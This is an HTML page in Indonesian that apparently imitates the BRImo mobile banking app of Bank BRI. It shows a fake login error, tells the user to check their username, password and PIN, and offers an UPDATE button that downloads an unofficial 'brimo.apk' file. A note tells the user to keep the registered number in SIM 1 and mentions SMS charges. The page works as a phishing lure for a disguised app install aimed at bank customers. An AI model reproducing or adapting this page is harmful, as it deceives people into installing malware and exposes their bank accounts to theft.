<!DOCTYPE HTML>
<html lang="en"><head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, viewport-fit=cover">
	<meta name="description" content="Bank BRI terus berinovasi mengembangkan produk yang sesuai dengan perkembangan jaman untuk memenuhi kebutuhan nasabah">
	<meta name="apple-mobile-web-app-capable" content="yes">
	<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
	<meta name="theme-color" content="#0f78cb">
	<meta property="og:type" content="website">
	<meta http-equiv="Content-Security-Policy" content="default-src * 'self' 'unsafe-inline' 'unsafe-eval' data: gap:">
	<title>ERROR</title>    <title>BRImo Bank BRI</title>
    <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css">

    <!-- Slick CSS -->
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick-theme.css">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous">

    <!-- Our CSS -->
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&display=swap');
        body {
            font-family: 'Nunito', sans-serif;
            html{overflow-x: hidden;}
        }

        h2 {
            font-family: 'Nunito', sans-serif; 
            font-size: 23px; 
            font-weight: bold; 
            color: #4682B4; 
            letter-spacing: 1.2px;
            text-align: center;
            line-height: 1; 
            border-radius: 5px; 
            
        }

        h3 {
            font-family: 'Nunito', sans-serif;
            font-size: 13px; 
            font-weight: bold; 
            color: #0f78cb;
            text-align: center;
            letter-spacing: 1px;
            line-height: 2; 
            border-radius: 5px; 
            
        }
        
        h9 {
            font-family: 'Nunito', sans-serif;
            font-size: 13px; 
            font-weight: bold;
            text-align: center;
            color: #0086e0; 
            letter-spacing: 1.4px;
            line-height: 1; 
            border-radius: 5px; 
            
        }
        
        h4 {
            font-family: 'Nunito', sans-serif;
            font-size: 13px; 
            font-weight: bold; 
            color: #000; 
            letter-spacing: 1px;
            text-align: center;
            line-height: 1; 
            border-radius: 5px; 
            
        }
        
        h5 {
            font-family: 'Nunito', sans-serif;
            font-size: 16px; 
            font-weight: bold; 
            color: #0086e0; 
            letter-spacing: 1px;
            text-align: center;
            line-height: 1; 
            border-radius: 5px; 
            
        }
        
        h6 {
            font-family: 'Nunito', sans-serif;
            font-size: 13px; 
            font-weight: bold; 
            color: #000; 
            letter-spacing: 1px;
            text-align: center;
            line-height: 1; 
            border-radius: 5px; 
            
        }

        .btn-punya {
            display: block;
            margin: 0px auto 0 auto;
            padding: 4px; 
            cursor: pointer; 
            background: none rgb(0, 134, 224);
            border: none; 
            text-align: center; 
            height: 40px; 
            width: 300px; 
            max-width: 85%;
            font-family: 'Nunito', sans-serif;
            font-size: 16px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px;
            line-height: 1; 
            border-radius: 6px; 
            box-shadow: rgb(170, 170, 170) 10px 10px 12px 0px; 
            transition: background 200ms ease 0s;
        }

        .form-log {
            box-sizing: border-box; 
            height: 45px; 
            width: 536px; 
            max-width: 90%; 
            border: 2px solid rgb(0, 134, 224); 
            border-image: initial; 
            background-color: rgb(255, 255, 255); 
            border-radius: 20px; 
            box-shadow: rgb(237, 237, 237) 2px 2px 2px 0px; 
            font-family: 'Nunito', sans-serif;
            font-size: 16px; 
            color: rgb(28, 28, 28); 
            word-spacing: 7px; 
            padding: 0px 45px;
        }
        
        #ionIcons {
            color: rgb(22, 119, 199);
            font-size: 29px;
            position: absolute;
            display: block;
            margin-top: 3px;
            margin-left: 35px;
        }
        
        input {
            border: 3px solid rgb(0, 134, 224);
            border-radius: 8px;
            padding: 5px 10px;
        }
        
        h1{
            display: table;
            background: #F8F8FF;
            color: #fff;
            padding: 0px;
            width: 80px;
            
        }
        
        h7{
            display: table;
            background: #3081ce;
            color: #fff;
            padding: 15px;
            width: 100%;
            font-size: 12px;
            text-align: center;
            font-family: 'Nunito', sans-serif;
            
        }

        .container {
            max-width: 460px;
            padding: 15px;
            background-color: #fff;
            margin-left: auto;
            margin-right: auto;
        }

        .slider .slick-slide {
            border: solid 0px #000;
        }

        .slider .slick-slide img {
            width: 100%;
            margin-top: 0px;
        }

        /* make button larger and change their positions */
        .slick-prev, .slick-next {
            width: 0px;
            height: 0px;
            z-index: 1;
        }
        .slick-prev {
            left: 0px;
        }
        .slick-next {
            right: 0px;
        }
        .slick-prev:before, 
        .slick-next:before {
            font-size: 0px;
            text-shadow: 0 0 0px rgba(0,0,0,0.5);
        }
        
        /* move dotted nav position */
        .slick-dots {
            bottom: 0px;
        }
        /* enlarge dots and change their colors */
        .slick-dots li button:before {
            font-size: 12px;
            color: #000;
            text-shadow: 0 0 10px rgba(0,0,0,0.5);
            opacity: 0;
        }
        .slick-dots li.slick-active button:before {
            color: #dedede;
        }

        /* transition effects for opacity */
        .slick-arrow,
         {
            transition: opacity 0.2s ease-out;
        }
        
        legend {
            padding: 7px;
            background: #fff;
            color: #3081ce;
        }

    </style>
</head>
<body>
<br>
    <div class="container">
      <div><br></div>
        <h2><strong>Terjadi Kesalahan Saat Login..<br>  </strong></h2><br>
        <div><br></div>
       <center><div>
             <legend>
             <img src="https://user-images.githubusercontent.com/141388247/262025397-866ad19e-265d-4cef-9855-6bd7b2b67475.png" height="220" width="250"><br><br>
            </legend></div>
            <div class="row">
                <div class="col-12" style="width: 400px; max-width: 100%; display: block; margin: -10px auto;"><div><div><br></div>
                <div><br></div>
                <h6 style="font-family: 'Nunito', sans-serif; font-size: 12px; font-weight: none; color: #4682B4; letter-spacing: 0px; text-align: center; line-height: 1; biorder-radius: 5px;">Di perlukan update versi untuk akses masuk & pastikan Username / Password dan PIN yang kamu masukan telah benar.</h6></div>
<div><br></div>
      <div class="row">
            <button class="btn-punya" onclick="location.href='/instal lanjut buka untuk update aplikasi brimo.apk';">UPDATE</button>
          </div></br></div>
            <button class="btn-punya" onclick="location.href='/index.html';">KEMBALI</button><div><br></div>
            <div><br></div>
<h6 style="font-family: 'Nunito', sans-serif; font-size: 16px; font-weight: none; color: 	#FF4500; letter-spacing: 0px; text-align: center; line-height: 1; border-radius: 5px;">PETUNJUK !!</h6>
<h6 style="font-family: 'Nunito', sans-serif; font-size: 10px; font-weight: none; color: #808080; letter-spacing: 0px; text-align: center; line-height: 1; biorder-radius: 5px;"> Pastikan koneksi internet anda stabil dan pastikan nomor telpon yang terdaftar pada akun BRImo anda terletak pada SIM 1 kemungkinan untuk tarif SMS akan dikenakan biaya standar persms.</h6>
            <br>
       <!-- JQuery -->
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    
    <!-- Slick JS -->    
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js"></script>

    <!-- Our Script -->
    <script>
        $(document).ready(function(){
            $('.slider').slick({
                autoplay: true,
                autoplaySpeed: 500,
                dots: true
            });
        });
    </script>


</div></div></div></div></body></html>
